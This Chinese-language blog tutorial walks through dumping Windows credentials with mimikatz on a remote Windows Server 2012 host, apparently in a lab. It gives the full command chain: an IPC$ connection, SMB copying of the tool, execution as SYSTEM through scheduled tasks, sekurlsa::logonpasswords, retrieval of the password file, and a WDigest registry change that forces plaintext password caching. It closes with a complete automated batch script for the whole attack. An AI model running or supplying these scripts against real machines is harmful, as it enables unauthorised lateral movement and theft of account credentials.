当前位置:   article > 正文

mimikatz抓取密码_mimikatz获取密码

mimikatz获取密码
一、上传mimikatz到2012

1、使用脚本建立ipc$连接

image-20220406190309170

net use #查看是否连接成功
  • 1

image-20220406190153217

2、上传mimikatz工具包和减压脚本

copy mimikatz_trunk.zip \\192.168.139.128\c$
copy jianya.bat \\192.168.139.128\c$
  • 1
  • 2

image-20220406200934646

3、设置定时任务执行减压脚本

schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn jianya /sc DAILY /tr C:\jianya.bat /F #系统大于等于windows2012 创建jianya对应执行文件
schtasks /run /s 192.168.139.128 /tn jianya /i  #运行jianya任务
dir \\192.168.139.128\c$ #查看目标c盘目录
  • 1
  • 2
  • 3

image-20220406202740791

mimikatz工具包和减压脚本全部上传成功

jianya.bat已成功执行,mimikatz工具包已减压缩成功

二、执行mimikatz

1、建立执行mimikatz工具的脚本–>mimika.bat

cd /
cd mimikatz
cd /x64
mimikatz.exe "privilege::debug "sekurlsa::logonpasswords full" exit >> c:\pass.txt
#该脚本将mimikatz.exe执行的结果保存到c盘pass.txt文件中
  • 1
  • 2
  • 3
  • 4
  • 5

2、上传并执行mimikatz脚本

copy mimika.bat \\192.168.139.128\c$
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn mimika /sc DAILY /tr C:\mimika.bat /F #系统大于等于windows2012 创建mimika对应执行文件
schtasks /run /s 192.168.139.128 /tn mimika /i  #运行mimika任务
dir \\192.168.139.128\c$ #查看目标c盘目录
  • 1
  • 2
  • 3
  • 4

image-20220406204252880

image-20220406204643223

将pass.txt下载到主机

type \\192.168.139.128\c$\pass.txt >> c:\pass.txt
  • 1

image-20220406205223185

image-20220406205240634

administrator的密码hash值

image-20220406205347691

3、由于在系统版本大于windows serve 2012 或者系统安装了KB287199补丁时,系统的内部就不会在保存明文密码,这样是用mimikatz就无法从内存中读取明文密码,除非修改注册表,然后让用户重新登录

reg add HKLM\SYSTEM\CurrentControlSet\Centrol\SecurityProvider\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  • 1

image-20220407202619954

三、总结

在知道目标ip密码和用户的情况下,可以直接使用ipc$连接上传mimikatz工具集,使用脚本将其减压、执行,然后将mimikatz抓取的密码再次回写到主机c盘

如果不知道目标的这些信息可以使用python脚本爆破,但是效率低而且如果密码复杂,很难爆破成功

mimikatz.bat

@echo off
cd /
cd /Users/Administrator
cd Desktop
set /p ip=ip:::
set /p pass=password:::
set /p user=username:::
net use \\%ip% /del > nul
echo 已清除ipc连接,重新连接ipc
net use \\%ip%\ipc$ %pass% /user:%user% > nul
echo 回车复制减压脚本到目标并执行,耐心等待
pause >nul
echo.
copy mimikatz_trunk.zip \\192.168.139.128\c$
copy jianya.bat \\192.168.139.128\c$
echo.
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn jianya /sc DAILY /tr C:\jianya.bat /F > nul
schtasks /run /s 192.168.139.128 /tn jianya /i > nul
schtasks /delete /s 192.168.139.128 /tn jianya /f > nul
echo 减压mimikatz工具集成功
echo 回车复制执行mimikatz脚本到目标并执行,耐心等待
pause > nul
echo.
copy mimika.bat \\192.168.139.128\c$
echo.
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn mimika /sc DAILY /tr C:\mimika.bat /F > nul
schtasks /run /s 192.168.139.128 /tn mimika /i > nul
schtasks /delete /s 192.168.139.128 /tn mimika /f > nul
ping -n 5 127.0.0.1 > nul
echo.
type \\192.168.139.128\c$\pass.txt >> c:\pass.txt
echo 内容已放到c盘pass.txt文件中
pause > nul
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33

jianya.bat

unzip.exe -d c:\mimikatz c:\mimikatz_trunk.zip 
  • 1

mimika.bat

cd /
cd mimikatz
cd x64
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> c:\pass.txt
  • 1
  • 2
  • 3
  • 4

image-20220406222852366

image-20220406223010344

image-20220406222941351

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Monodyee/article/detail/690261
推荐阅读
相关标签
  

闽ICP备14008679号